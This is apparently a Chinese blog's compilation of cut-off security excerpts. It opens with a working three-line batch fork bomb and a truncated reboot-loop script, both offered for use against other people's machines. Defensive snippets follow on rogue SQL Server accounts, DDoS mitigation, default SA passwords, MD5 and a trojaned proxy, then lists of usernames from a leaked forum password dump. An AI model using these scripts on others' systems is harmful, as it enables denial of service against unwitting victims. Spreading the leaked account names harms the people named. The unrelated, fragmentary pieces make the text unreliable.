收集：X.DW's blog
链接：http://hi.baidu.com/hkxdw
第一个:让别人内存OVER(逼他重启)
@echo off
start cmd
%0

就这3行了

第二个:让对方重启指定次数(害人专用)
@echo off
if not exist c:\1.txt echo. >c:\1.txt & goto err1
...

经常看到网友在网上发帖问sqldebugger、TsInternetUser这个两个用户究竟是什么，是否是正常的系统用户，我觉得不少情况下这个用户都被人利用了，也就是说你可能已经被人入侵了。

TsInternetUser这个用户资料很少，我也没怎么接触过，不知道是怎么生成的，这里主要介绍sqldebugger这个系统用户。安装完sqlserver后，确实可能创建一个sqldebugger用户，如果你没有装sqlserver，系统突然出现这个用户，那一般是被黑了，因为系统出现莫名其妙的用户后，我们会利用搜索引擎查一下，但搜索引擎会告诉我们这个用户确实可能存在，下面有两个方法鉴别这个用户是否已经别人利用了：

几乎所有的主机平台都有抵御DDoS的设置。以Linux操作系统为例，其防范技术主要分为三大类，第一类是通过合理配置系统，达到资源最优化和利用最大化，第二类是通过加固TCP/IP协议栈来防范DDoS；第三类是通过防火墙、路由器等过滤网关，有效地探测攻击类型并阻击攻击。
必须明确的是，DDoS攻击在TCP连接原理上是合法的，除非TCP协议重新设计， 明确定义DDoS和其他正常请求有何不同，否则不可能完全阻止DDOS攻击，我们所做的只是尽可能地减轻DDoS攻击的危害。
1．服务器设置
...

下面介绍如何判断服务器是否受到DDoS攻击。使用如下几个简单的步骤可以进行判断。
◆ 最明显的感觉是服务器响应缓慢，一般直接可以从服务器提供的页面显示速度上察觉。
◆ 登录服务器，用“netstat”命令查看，发现服务器有大量等待的TCP连接。
◆ 利用Sniffer、Tcpdump等嗅探工具会发现网络中充斥着大量源地址为假的伪装数据包。
◆ 从ISPtgi控上可以看出服务器的数据流量猛增，造成网络拥塞，服务器甚至不能正常地与外界通信。
...

作者：烟台 王岗（www.5iadmin.com，QQ：369459071），转载请保留此信息，谢谢。

笔者从事网络管理工作，数月前，应邀对本地一家公司做了一次安全检测，在检测就要结束的时候，在内网用嗅探到了一个SQLServer数据库的SA密码，经该公司的网络管理人员介绍说，该数据库服务器运行了一套软件，在互联网有固定的ip地址，用于与各地子公司交换数据用的，SA密码是软件安装人员设置的，数据库服务器从来没有出现过安全问题。尽管这个SA密码非常复杂，10多位字符，由数字和字母混合组成，但笔者一看到这个SA密码的部分字符，马上想到国内的一家软件公司，会不会这个家软件公司的SA密码设置都是相同的，或者大部分是这个？经过几个月的测试，笔者发现了更为惊人的情况，国内多个软件公司的部分数据库软件产品都存在安全隐患，严重威胁到运行服务器和数据的安全，入侵者可以在短时间内完全控制互联网上大量数据库服务器。SA密码泄露会造成什么危害请参考笔者的这篇文章：http://www.5iadmin.com/post/286.html。由于众所周知的原因，本文没有进行抓图说明，下文仅以字母代表软件公司的名称。
...

MD5的全称是Message-Digest algorithm 5（信息-摘要算法），MD5是一种不可逆的算法，即对生成的密文求逆，对应着无穷个逆。它是在MD4基础上发展而来的，由于MD4可以在几分钟内找到一个冲突，所以很快就被淘汰了。现在，对MD5安全性的问题越来越被重视，甚至有的人就认为：MD5将很快走入历史。那么，事实情况是否如此，MD5真的不安全了吗？
　　本文主要探讨几个容易对MD5产生误解的几个问题。
　　误区一：碰撞随时可能发生
　　如果对MD5摘要算法不了解，便误以为发现碰撞等同于破解，这种误解导致了很多人拼命地去寻找解密算法，最后只能无功而返。碰撞的发生是两个运动的过程，两个被改变的结果存在某种联系就是碰撞。MD5碰撞的发生主要是由于散列算法本身缺陷所导致的，并非MD5所独有，而MD5最大的好处应该是大大降低了这种碰撞被发现的几率和时间周期。只要拖延了足够的时间，MD5的价值也就得到了实现。问题是，随着计算机硬件技术的不断发展，这种靠时间延迟的摘要算法无法解决大大提高了的碰撞几率，也就使这种算法变得危险起来。
...

我是通过Windows 2000和winroute的代理方式上网。这两天，代理服务器总是出现一些怪现象，运行程序好像很缓慢，而且还会自动重启。难道是中了病毒？还是中了木马？不管怎么样，先去看看再说吧。

来到机房，先把网线拔去。重启后，运行杀毒软件，杀了一遍，并没有发现病毒。随后插上网线，打开IE浏览器，这时奇怪的事情发生了，怎么地址栏里有一些莫名其妙的网址？难道有人用过这台电脑？我觉得事态严重了，可能中了木马。

我起身去倒了杯水，准备一场大战。当我回来的时候，浏览器居然自动打开了 “梦幻西游”的网站，正在下载客户端（还新装了一个下载软件），它居然想用我的代理服务器来挂机打网络游戏！

同事的一台笔记本电脑装的xp系统，三番几次被人增加系统用户，用户名都internetusers，问问同事的笔记本电脑最近都做什么了，答复是一家软件公司给安装了一套数据库软件，这下基本明白怎么回事了，按了2次重启键，用以前的用户登录到系统，看到了sqlserver的运行图标，打开查询分析其，用sa登录，密码为空，登录成功，没检查是否有木马什么的。

这几天在搜索资料时，通过快照发现一个保存大量用户名和md5密码的文件，应该是某个技术论坛的用户和密码，下面是部分用户名，如果有你常用的id，而且你有一码行天下的习惯，那就需要注意了，有可能被人社工到你的其他密码。

Adrianlu
adriano
adriit
adrion
ads__23
ads7408
adsir_cao
ADSL
adsl123321
adsl123zxh
...

这几天在搜索资料时，通过快照发现一个保存大量用户名和md5密码的文件，应该是某个技术论坛的用户和密码，下面是部分用户名，如果有你常用的id，而且你有一码行天下的习惯，那就需要注意了，有可能被人社工到你的其他密码。

8149801
8156
8160603
8162ajian
8163959
8170138
8171459
8182838485
8195159
8195426
...